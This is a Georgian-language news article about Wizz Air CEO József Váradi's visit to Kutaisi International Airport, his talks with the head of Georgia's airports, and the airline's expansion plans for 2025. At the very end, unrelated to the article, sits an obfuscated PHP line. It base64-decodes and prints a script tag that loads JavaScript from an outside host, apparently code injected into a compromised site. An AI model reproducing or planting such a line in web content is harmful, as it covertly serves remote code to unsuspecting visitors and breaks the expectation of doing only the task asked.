celsiusi
ავერსი საქკაბელი

ევროპის ყველაზე სწრაფად მზარდი ავიაკომპანია Wizz Air-ის დამფუძნებელი და გენერალური დირექტორი, ჯოზეფ ვარადი საქართველოში ერთდღიანი სამუშაო ვიზიტით ჩამოვიდა. ვიზიტის ფარგლებში, ქუთაისის საერთაშორისო აეროპორტში ვარადი საქართველოს აეროპორტების გაერთიანების გენერალურ დირექტორს, ირაკლი ქარქაშაძეს შეხვდა. შეხვედრაზე მხარეებმა თანამშრომლობის გაღრმავების გზებზე, არსებულ გამოწვევებსა და სამომავლოდ ახალი მიმართულებების დამატების შესაძლებლობებზე იმსჯელეს.

,,ქუთაისის საერთაშორისო აეროპორტში ვუმასპინძლეთ Wizz Air-ის დამფუძნებელსა და გენერალურ დირექტორს ჯოზეფ ვარადის. განვიხილეთ ქუთაისის აეროპორტში მათი ოპერირების საკითხები, ის გამოწვევები რაც გვაქვს და სამომავლო გეგმები. ძალიან პოზიტიურად ვართ განწყობილი იმისთვის, რომ ჩვენი თანამშრომლობა კიდევ უფრო გაძლიერდება და Wizz Air კიდევ უფრო აქტიურად იქნება წარმოდგენილი ჩვენს აეროპორტში. ვისაუბრეთ ასევე, ახალი საჰაერო ხომალდების დამატებასთან დაკავშირებით და იმედი მაქვს, რომ უახლოეს მომავალში გვექნება საინტერესო სიახლეები ჩვენი მგზავრებისთვის. ჩვენ ერთობლივად გავაგრძელებთ ქუთაისის საერთაშორისო აეროპორტში ერთობლივად განვითარებას და Wizz Air-ი ჩვენს მგზავრებს კვლავ შესთავაზებს საინტერესო სიახლეებს და ახალ მიმართულებებს,-‘’განაცხადა ირაკლი ქარქაშაძემ.

Wizz Air-ი საქართველოში უკვე 12 წელია ოპერირებს და ქუთაისის საერთაშორისო აეროპორტში 4 ბაზირებული ხომალდი ჰყავს. ამ ეტაპზე ავიაკომპანია ქუთაისიდან 15 ქვეყნის 23 მიმართულებით დაფრინავს.

,,მოხარულები ვართ, რომ დღეს ვიმყოფებით საქართველოში. მე აქ პირველად 2012 წელს ვიყავი, როდესაც ქუთაისის საერთაშორისო აეროპორტი გაიხსნა და მას შემდეგ ქვეყანაში საგრძნობ განვითარებას ვხედავთ. ჩვენ გავხდით ნომერ პირველი ავიაკომპანია საქართველოში. შევიტანეთ მნიშვნელოვანი წვლილი საქართველოს ავიაციის განვითარებაში და ხელი შევუწყვეთ უფრო მეტ მგზავრს ჰქონოდა საშუალება ესარგებლა დაბალბიუჯეტური ფრენებით, როგორც ქვეყნის შიგნით, ისე ქვეყნის გარეთ და დაეთვალიერებინათ საქართველოს ღირსესანიშნაობები. გასულ წელს, გარკვეული მიზეზების გამო, ჩვენ არ გვქონდა ჩვენი ბიზნესის განვითარების საშუალება. ახლა უკვე თამამად შეგვიძლია ვთქვათ, რომ მომავალი 2025 წელი Wizz Air-ის ბაზებისთვის მნიშვნელოვანი წელი იქნება და საქართველოც ამ ბაზების ნაწილი გახდება. გვაქვს მოლოდინი, რომ დავამატებთ კიდევ ერთ ხომალდს ქუთაისის აეროპორტის ბაზას, განვიხილავთ ახალი მიმართულებების დამატების შესაძლებლობას და არსებულ მიმართულებებზე ფრენის სიხშირეების გაზრდას. განაცხადა ჯოზეფ ვარადიმ.

ავიაკომპანიის გენერალური დირექტორი და დამფუძნებელი ყოველწლიურად სტრატეგიულად მნიშვნელოვან ქვეყნებს სტუმრობს. მათ შორისაა საქართველო, სადაც ჯოზეფ ვარადი, Wizz Air-ის 12 წლიანი ოპერირების მანძილზე უკვე მესამედ იმყოფებოდა და აეროპორტების გაერთიანების გენერალური დირექტორის შემდეგ ქუთაისის საერთაშორისო აეროპორტის ბაზაზე დასაქმებულ თანაშრომლებს შეხვდა.

134
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");